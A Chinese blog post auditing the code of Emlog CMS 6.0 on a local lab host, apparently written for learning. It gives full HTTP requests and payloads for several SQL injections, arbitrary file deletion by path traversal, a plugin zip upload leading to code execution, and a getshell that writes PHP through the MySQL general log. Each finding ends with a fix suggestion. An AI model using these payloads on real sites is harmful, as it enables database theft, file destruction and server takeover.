1、EmlogCms代码审计

最新推荐文章于 2024-06-25 14:30:11 发布
最新推荐文章于 2024-06-25 14:30:11 发布
阅读量424 收藏 7
点赞数 8
分类专栏: php代码审计(二) 文章标签: php 代码审计
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/YINZHE_/article/details/136445563
版权

一、SQL注入

1、后台标签删除处存在1处sql注入

漏洞条件

● 漏洞url:  http://emlog6.0.com/admin/tag.php?action=dell_all_tag
● 漏洞参数:tag[xx]
● 是否存在限制:无
● 是否还有其他条件:action=dell_all_tag,token

复现

POST /admin/tag.php?action=dell_all_tag HTTP/1.1
Host: emlog6.0.com
Content-Length: 65
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://emlog6.0.com
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://emlog6.0.com/admin/tag.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: em_advset=block; posterurl=http%3A%2F%2Femlog6.0.com%2F; postermail=22%40qq.com; commentposter=aaa; PHPSESSID=oqlj6bcle1k5ukcrfnj52e99j4; EM_AUTHCOOKIE_MplDHGA7WnMHlJcetCXbqfVJOSdPCZEb=emm666%7C%7C0284ab7039de5516859580dcfca2e03a; EM_TOKENCOOKIE_5981f06dafb0e1c6acd33302c370c4dd=f03cfe2175392b6fea4d5d25ef72278f
Connection: close

c%5B111+or+sleep(1)%5D=1&token=f03cfe2175392b6fea4d5d25ef72278f

延时倍数

在这里插入图片描述

代码

tags变量键值分离,针对键做了数据库操作

在这里插入图片描述
在这里插入图片描述

修复建议

对用户的输入验证和过滤。使用预编译和转义函数。

2、后台评论处评论者标签下来自处存在1处sql注入

漏洞条件

● 漏洞url:  http://emlog6.0.com/admin/comment.php?action=delbyip&ip=127.0.0.1&token=ee4b851eb3f103685da3bbbdd7837051
● 漏洞参数:ip
● 是否存在限制:单引号闭合;需要登录后台获取token
● 是否还有其他条件:action=delbyip&ip=&token参数都必须存在

复现

功能位置--评论--

在这里插入图片描述

payload:' and updatexml(1,concat(0x7e,(SELECT @@version),0x7e),1)

GET /admin/comment.php?action=delbyip&ip=1'and+updatexml(1,concat(0x7e,(SELECT+%40%40version),0x7e),1)--+kjdX&token=123e2dd43ef80874d0fe4975866fdf19 HTTP/1.1
Host: emlog6.0.com
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://emlog6.0.com/admin/comment.php?active_del=1
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: em_advset=block; em_sort_new=inline-block; PHPSESSID=2i21vnksbvj4kjcntdm2tq8265; EM_AUTHCOOKIE_Di1QoHFKhsmGv58a4JrR5r2U8w3TS3wz=admin%7C%7Cea43ac510b8f06cad8d2bbf9f032c6a6; EM_TOKENCOOKIE_db64d83ec02ed684b1f95dd4423692cb=123e2dd43ef80874d0fe4975866fdf19; em_logpwd_3=9999; commentposter=admin; posterurl=http%3A%2F%2Femlog6.0.com%2F
Connection: close

在这里插入图片描述
在这里插入图片描述

代码

get接收ip变量没有使用addslashesh函数过滤,sql语句里有单引号,直接闭合就可以

在这里插入图片描述
在这里插入图片描述

修复建议

对用户的输入验证和过滤。使用预编译和转义函数。

3、后台外观-导航-添加页面到导航添加处存在2处报错注入

漏洞条件

● 漏洞url:  http://emlog6.0.com/admin/navbar.php?action=add_page
● 漏洞参数:pages[x]=y
● 是否存在限制:无
● 是否还有其他条件:action=add_page

复现

第一处

POST /admin/navbar.php?action=add_page HTTP/1.1
Host: emlog6.0.com
Content-Length: 94
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://emlog6.0.com
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://emlog6.0.com/admin/navbar.php?error_e=1
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: em_advset=block; em_sort_new=inline-block; em_link_new=inline-block; em_custom_text_new=inline-block; commentposter=admin; posterurl=http%3A%2F%2Femlog6.0.com%2F; PHPSESSID=pk3dk4qk2v7s89ef1e7ckm7851; EM_AUTHCOOKIE_Di1QoHFKhsmGv58a4JrR5r2U8w3TS3wz=admin%7C%7Cea43ac510b8f06cad8d2bbf9f032c6a6; EM_TOKENCOOKIE_db64d83ec02ed684b1f95dd4423692cb=24225d813e551487a6648954b0b94a32; em_logpwd_9=1234567
Connection: close

pages%5B6%5D=2'+AND+GTID_SUBSET(CONCAT(0x7e,(SELECT+database()),0x7e),8959)+AND+'RNzK'%3d'RNzK

在这里插入图片描述

第二处

POST /admin/navbar.php?action=add_page HTTP/1.1
Host: emlog6.0.com
Content-Length: 96
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://emlog6.0.com
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://emlog6.0.com/admin/navbar.php?error_e=1
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: em_advset=block; em_plugin_new=block; posterurl=http%3A%2F%2Femlog6.0.com%2F; PHPSESSID=k1dnnurltjs04ug26am3hvj127; EM_TOKENCOOKIE_768a2d877f865edd16df5b714a9a06de=a900039784be46353b3d41fed6e684ec; postermail=22%40qq.com; commentposter=aaa; EM_AUTHCOOKIE_xul7zSEN1X7zDYShl6SvaxwZYhrQOepm=admin%7C%7Cc283aa764f471126b136d9acfbebd54f
Connection: close

pages%5B2+AND+GTID_SUBSET(CONCAT(0x7e,(SELECT+database()),0x7e),8959)+AND+'RNzK'%3d'RNzK'%5D=111

在这里插入图片描述

代码

如果 pages 参数存在并且有值,则将其值赋给变量 $pages,否则将 $pages 赋值为空数组。遍历了一个名为 $pages 的数组。在每次迭代中,它从数组中取出一个键值对,其中键是 $id,而值是 $title。从接收到sql语句都没有任何过滤

在这里插入图片描述
在这里插入图片描述

修复建议

对用户的输入验证和过滤。使用预编译和转义函数。

4、后台外观-侧边栏保存组件排序处存在1处sql注入

漏洞条件

● 漏洞url:  http://emlog6.0.com/admin/widgets.php?action=compages
● 漏洞参数:widgets[]
● 是否存在限制:无
● 是否还有其他条件:action=compages

复现

POST /admin/widgets.php?action=compages HTTP/1.1
Host: emlog6.0.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Content-Length: 125
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Language: zh-CN,zh;q=0.9
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Cookie: em_advset=block; em_sort_new=inline-block; em_custom_text_new=inline-block; posterurl=http%3A%2F%2Femlog6.0.com%2F; postermail=22%40qq.com; commentposter=aaa; PHPSESSID=1k2r5e2fgke63vjqv3gbn1mkf6; EM_AUTHCOOKIE_xul7zSEN1X7zDYShl6SvaxwZYhrQOepm=admin%7C%7Cc283aa764f471126b136d9acfbebd54f; EM_TOKENCOOKIE_768a2d877f865edd16df5b714a9a06de=3727215c7d05ed0180fa46f6b4043bd7
Origin: http://emlog6.0.com
Referer: http://emlog6.0.com/admin/widgets.php?activated=1
Upgrade-Insecure-Requests: 1
Accept-Encoding: gzip

wgnum=1&widgets%5B%5D=search&widgets%5B%5D=archive&widgets%5B%5D=link'and/**/extractvalue(1,concat(char(126),database()))and'

在这里插入图片描述

代码

widgets参数存在就将它序列化,不存在赋值为空,

在这里插入图片描述

如果 $isSyntax 的值为假,即值为0或为空,$value 则被赋值为在其两侧加上单引号的字符串,即 ' . $value . '。

在这里插入图片描述

修复建议

对用户的输入验证和过滤。使用预编译和转义函数。

二、文件操作

1、后台系统-数据库备份删除处存在任意文件删除

漏洞条件

● 漏洞url:  http://emlog6.0.com/admin/data.php?action=dell_all_bak
● 漏洞参数:bak[]
● 是否存在限制:无
● 是否还有其他条件:action=dell_all_bak

复现

在自己的文件夹创建文件,可实现跨目录删除文件

POST /admin/data.php?action=dell_all_bak HTTP/1.1
Host: emlog6.0.com
Content-Length: 27
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://emlog6.0.com
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://emlog6.0.com/admin/data.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: em_advset=block; em_plugin_new=block; commentposter=admin; posterurl=http%3A%2F%2Femlog6.0.com%2F; PHPSESSID=k1dnnurltjs04ug26am3hvj127; EM_AUTHCOOKIE_xul7zSEN1X7zDYShl6SvaxwZYhrQOepm=admin%7C%7Cc283aa764f471126b136d9acfbebd54f; EM_TOKENCOOKIE_768a2d877f865edd16df5b714a9a06de=a900039784be46353b3d41fed6e684ec
Connection: close

bak%5B%5D=../../../../1.txt

在这里插入图片描述

代码

bak参数存在且是数组,就会执行删除操作

修复建议

加强用户输入验证,并限制用户所能删除的文件范围。

2、后台系统-插件处存在1处文件上传漏洞

漏洞条件

● 漏洞url:  http://emlog6.0.com/admin/plugin.php?action=upload_zip
● 漏洞参数:filename
● 是否存在限制:上传的文件和文件夹的名字相同
● 是否还有其他条件:action=upload_zip,name=pluzip

复现

POST /admin/plugin.php?action=upload_zip HTTP/1.1
Host: emlog6.0.com
Content-Length: 629
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://emlog6.0.com
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary2DpnCXUHc5otIBms
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://emlog6.0.com/admin/plugin.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: em_advset=block; em_plugin_new=block; posterurl=http%3A%2F%2Femlog6.0.com%2F; PHPSESSID=k1dnnurltjs04ug26am3hvj127; EM_TOKENCOOKIE_768a2d877f865edd16df5b714a9a06de=a900039784be46353b3d41fed6e684ec; postermail=22%40qq.com; commentposter=aaa; EM_AUTHCOOKIE_xul7zSEN1X7zDYShl6SvaxwZYhrQOepm=admin%7C%7Cc283aa764f471126b136d9acfbebd54f
Connection: close

------WebKitFormBoundary2DpnCXUHc5otIBms
Content-Disposition: form-data; name="pluzip"; filename="text.zip"
Content-Type: application/x-zip-compressed

请求内容不显示:PK

在这里插入图片描述

上传后直接访问解压后端文件

在这里插入图片描述

代码

先判断上传的文件是否存在,如存在就判断上传的后缀是否为zip,在将上传的zip文件进行解压操作

在这里插入图片描述

对压缩包里的文件名称进行判断,如果压缩包名称为test则压缩包里必须存在test.php文件,否者会进行报错

在这里插入图片描述

修复建议

修复文件上传漏洞需要限制上传文件类型、验证文件的MIME类型、设置文件上传大小限制、实施恶意文件扫描,以及避免执行上传的文件,从而确保服务器的安全性。

3、后台数据库备份拿shell

漏洞条件

● 漏洞url:  http://emlog6.0.com/admin/data.php?action=import
● 漏洞参数:
● 是否存在限制:需要高数据库权限
● 是否还有其他条件:action=import,name=sqlfile, filename=参数存在

复现

数据库拿shell主要有两种方式:
1、select …into outfile  利用需要的条件有:
● 对web目录需要有写权限;
● 能够使用单引号;
● 知道绝对路径;
● secure-file-priv值必须为空(不能为null)
2、开启mysql日志记录general_log,将日志写入特定目录下,利用条件有:
● 对web目录需要要写权限;
● 能够使用单引号;
● 知道绝对路径;
● 能够执行多行sql语句。

第一种方法,先备份sql语句,在其基础上插入select “<?php phpinfo(); ?>” into outfile ‘eval.php’语句就ok了,但是默认secure-file-priv值null,这个方法行不通。
● 其中当参数 secure_file_priv 为空时,对导入导出无限制
● 当secure_file_priv 值为一个指定的目录时,只能向指定的目录导入导出
● 当secure_file_priv 值被设置为NULL时,禁止导入导出功能

在这里插入图片描述

第二种方法:数据库备份-编辑备份内容-导入编辑好的sql文件,直接访问生成的文件
#开启日志记录
set global general_log='on';
#设置日志记录的路径
SET global general_log_file='D:/phpstudy_pro/WWW/cms/emlog_6.0.0/src/eval1.php'; 
#任意查询恶意内容都会被保存到日志
SELECT '<?php phpinfo();?>';
注意:开启sql日志记录和设置日志路径文件需要高数据库权限

在这里插入图片描述

当前网站的数据库权限为,cms安装时选择的用户,

在这里插入图片描述

详细请求数据包

POST /admin/data.php?action=import HTTP/1.1
Host: emlog6.0.com
Content-Length: 1086
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://emlog6.0.com
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryfPRivdhzWTTFgYdA
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://emlog6.0.com/admin/data.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: em_advset=block; posterurl=http%3A%2F%2Femlog6.0.com%2F; postermail=22%40qq.com; commentposter=aaa; PHPSESSID=0b2864j2ah3vhq7ouift3i53i3; EM_AUTHCOOKIE_I8ovfEdc33MzTKkbau3AYXkL5WEBeWQF=emm666%7C%7Cd989e69e972e2e1e490cd83d89356916; EM_TOKENCOOKIE_8bd3e1f19392195216b74e3a316ab187=d1709c4b7c5cadfa5c1e988f39e0eed1; EM_AUTHCOOKIE_MplDHGA7WnMHlJcetCXbqfVJOSdPCZEb=emm666%7C%7C0284ab7039de5516859580dcfca2e03a; EM_TOKENCOOKIE_5981f06dafb0e1c6acd33302c370c4dd=0d1a684b7b31b8048948247ab4fce60f
Connection: close

------WebKitFormBoundaryfPRivdhzWTTFgYdA
Content-Disposition: form-data; name="token"

0d1a684b7b31b8048948247ab4fce60f
------WebKitFormBoundaryfPRivdhzWTTFgYdA
Content-Disposition: form-data; name="sqlfile"; filename="emlog_20240102_213007.sql"
Content-Type: application/octet-stream

#version:emlog 6.0.0
#date:2024-01-02 21:30
#tableprefix:emlog_
DROP TABLE IF EXISTS emlog_link;
set global general_log='on';
SET global general_log_file='D:/phpstudy_pro/WWW/cms/emlog_6.0.0/src/eval99.php'; 
SELECT '<?php phpinfo();?>';
CREATE TABLE `emlog_link` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `sitename` varchar(30) NOT NULL DEFAULT '',
  `siteurl` varchar(75) NOT NULL DEFAULT '',
  `description` varchar(255) NOT NULL DEFAULT '',
  `hide` enum('n','y') NOT NULL DEFAULT 'n',
  `taxis` int(10) unsigned NOT NULL DEFAULT '0',
  PRIMARY KEY (`id`)
) ENGINE=MyISAM AUTO_INCREMENT=2 DEFAULT CHARSET=utf8;

INSERT INTO emlog_link VALUES('1','emlog.net','http://www.emlog.net','emlog官方主页','n','0');


#the end of backup
------WebKitFormBoundaryfPRivdhzWTTFgYdA--

在这里插入图片描述

直接访问即可

在这里插入图片描述

此时数据库的记录已经开启,且写入文件为上面的指定php文件,我们很多设计到数据库的操作都会被记录,
比如用户登录的时候,一定会将传入的账户密码带入数据库查询,我们可以直接在登录的时候,传入payload,
<?php system(calc);?>
然后刷新日志文件eval99.php即可触发

在这里插入图片描述

代码

导入备份文件,日志默认记录,被配文件会被日志执行sql语句

在这里插入图片描述
在这里插入图片描述

修复建议

修复GetShell漏洞的方式是严格限制并检查文件上传,设置正确的文件权限,以及合理配置服务器以防止不安全的文件执行。
YINZHE_
关注
  • 8
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
简数采集器Emlog免登录采集发布插件接口
12-25
1. 可将采集的数据发送到Emlog系统,支持Emlog5.3、Emlog6.0和EmlogPro版本; 2. Emlog采集发布插件接口使用需密码安全验证,安全可靠,还可以设置相同标题数据是否重复发布; 3. 发布插件通用适配大多数文章采集...
3、emlog_pro2.0代码审计
Yzz_的博客
03-04 348
【代码】3、emlog_pro2.0代码审计
emlog 代码审计
y0un9er
04-03 449
emlog 代码审计练习
函数写到sql里还是代码里_CMS代码审计emlog 6.0
weixin_39658966的博客
11-28 76
一、前言本小菜也是刚开始玩代码审计,最近发现个比较有趣的CMS跟大家分享一波,虽然只找到一些鸡肋漏洞。废话不多说开始进入正题,本次审计的CMSemlog 6.0.0版本,官方地址为:http://www.emlog.net。二、审计思路在学习前辈们的文章后,自己稍微总结一下代码审计的思路主要可以分为以下四种。1) 查找可控变量,正向追踪变量传递过程,查看变量是否进行进行过滤,是否进行后...
Emlog6.6.0-PHP代码审计学习
weixin_53884648的博客
10-20 225
描述:在做一个产品安全测试时,最想的就是尽可能的找出所有的问题,不让产品带着问题发布,尽管目前在国家的倡导下站点都要进行相关的安全产品的部署,但产品本身存在问题,就会给攻击者攻击降低了门槛,除了开发产品种代码引起的安全问题,我们还要关注各种组件安全问题,在公布相关问题后及时更新官方版本。最后代码审计还是需要耐心的去看参数的引用情况,这方面还要共勉进行学习。整体文章应该还要加入一个漏扫工具使用和漏洞验证的。这里就不进行漏扫了。
代码审计emlog后台getshell
qq_42307546的博客
05-26 243
用的是较为古老的版本v1.0,这里只是作为一个代码审计的练习 项目地址 https://www.jb51.net/codes/105832.html 这里的漏洞点在 \content\plugins\ttjtg_banquan\ttjtg_banquan_setting.php,48-73行 <?php } function plugin_setting() { $fz_kaiguan = isset($_POST['fz_kaiguan']) ? trim($_POST['fz_kaiguan'
Emlog很少知道的两处漏洞
白昼小丑的博客
11-12 882
最终的cookie是由$user_login 、 $expiration $hash拼接而成,而$expiration是cookie的生存时间,$user_login是用户名。这里可以得知$key、$user_login、$expiration都是固定的那么只要知道AUTH_KEY就有伪造cookie造成越权的可能。我们将两个靶机的cookie拿出来比较确实是一样的。这里可以看到,调用了emHash这个类方法,并且这里使用了AUTH_KEY这个常量,这里说明这两个常量是有联系的。祝愿Emlog越来越好。
采集数据发布到Emlog网站指定分类栏目
moshi_6的博客
06-05 413
将采集文章发布到Emlog系统网站: 1. 获取指定分类名称; 2. 对接EmlogCMS发布插件或发布接口模块; 3. 简数采集器自动采集发送数据到Emlog网站;
EMLOG特定模板采集插件源码(支持模板FLY+LU+META主题)
weixin_42200504的博客
10-26 183
EMLOG特定模板采集插件源码(支持模板FLY+LU+META主题) 支持采集的模板:FLY主题、lu主题、meta主题;其他自测!!!   (就是说那个网站用的是这几个主题,就可以采集他网站的文章。) EMLOG特定模板采集插件源码 下载地址:https://www.downzz.com/Emlogcms/17372.html ...
Emlog音乐主题网站模板设置插件源码
weixin_42200504的博客
10-26 330
Emlog音乐主题网站模板设置插件源码 使用方法:   首先需要安装好Emlog6.0.1系统和模板设置插件(插件Emlog官网有)   登录后台直接上传模板应用即可! 进入emlog_blog 执行语句即可 Emlog音乐主题网模板设置插件源码 下载Emlog音乐主题网站模板设置插件源码 https://www.downzz.com/Emlogcms/17373.html ...
蓝白色简约 Emlog CMS主题模板SimpleBoxPro
06-05
SimpleBoxPro主题是博客吧自emlog官方论坛淘来的一款非常简约的emlog CMS模板,该emlog模板全局仅使用了3张图片,蓝白色设计,两三布局,预览728*90大幅广告位置,整体看上去简洁大气,挺好看的一款emlog模板,据说...
emlog管理员密码重置插件
06-05
1、将下载的zip包解压。 2、将解压后的 passwd.php文件上传到emlog的根目录 3、在浏览器里访问:http://你网站的域名/passwd.php 按照提示操作,即可重置密码。重置后如果该文件没自动删除,请务必手动删除。
[极客大挑战 2020]Roamphp4-Rceme
不会编程的崽的博客
06-20 391
右键源代码里给了提示,有备份文件index.php.swp,大伙都做到这来了,应该不用写了吧。加这个[~%FF]只是因为php7的解析方式,当然换成其他的也可以例如[~%EF] [~%CF]passthru(next(getallheaders()));然后,需要要绕过两层,多年rce经验,相信你一眼能看出。我们由内往外构造,这里需要前置知识(贴其他大佬的吧)知道原因可以在评论区踢我一脚。
深度解析SD-WAN在企业组网中的应用场景
TIANGEKUAJING的博客
06-21 376
在现代企业快速发展的网络环境中,SD-WAN技术不仅是实现企业各站点间高效连接的关键,也是满足不同站点对互联网、SaaS云应用和公有云等多种业务需求的理想选择。本文将从企业的WAN业务需求出发,对SD-WAN的组网场景进行全面解析,涵盖多种业务情境。
discuz插件之优雅草超级列表互动增强v1.2版本更新
qq_21592105的博客
06-24 334
title]20220617 v1.2发布[/title]增加了对php8的支持 增加了 对discuz3.5的支持。discuz插件之优雅草超级列表互动增强v1.2版本更新。
windowns server2016服务器配置php调用powerpoint COM组件
qq_40408065的博客
06-21 1363
解决问题:windowns server2016服务器配置php调用powerpoint COM组件 环境: windows server2016 宝塔(nginx+mysql+php7.2) IIS 搭建宝塔: 下载地址:https://www.bt.cn/download/windows.html ​ 安装使用,开启时若主机在云上,登录地址是本地ip加宝塔端口(8888),下面地址是宝塔自动生成的云 主机面板,需要将ip改为本地ip。 选择安装软件:nginx,php,mysql等 添加网站
仿迪恩城市门户分类信息网discuz模板
爱酷码的博客
06-24 428
Discuz x3.3模板 仿迪恩城市门户分类信息网 (GBK)
PHP框架详解:Symfony框架的深度剖析
qq_43341279的博客
06-24 455
Symfony框架作为PHP领域的佼佼者,以其严谨的架构、丰富的组件和强大的社区支持,成为许多大型项目和企业级应用的首选。本文将对Symfony框架进行深入剖析,从其起源、发展到核心特点,再到具体的使用案例,全面展现Symfony框架的魅力。Symfony框架凭借其强大的功能、灵活的架构和活跃的社区支持,已经成为PHP领域的领先框架之一。强大的组件库: Symfony框架提供了丰富的组件库,覆盖了Web开发的各个方面,减少了重复劳动。Symfony框架的架构基于分层设计,每一层都有明确的职责。
java调用海康威视SDK实现车牌识别
最新发布
业务能力是技术能力的基础!
06-25 643
海康威视SDK实现 报警布防方式的车牌识别

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值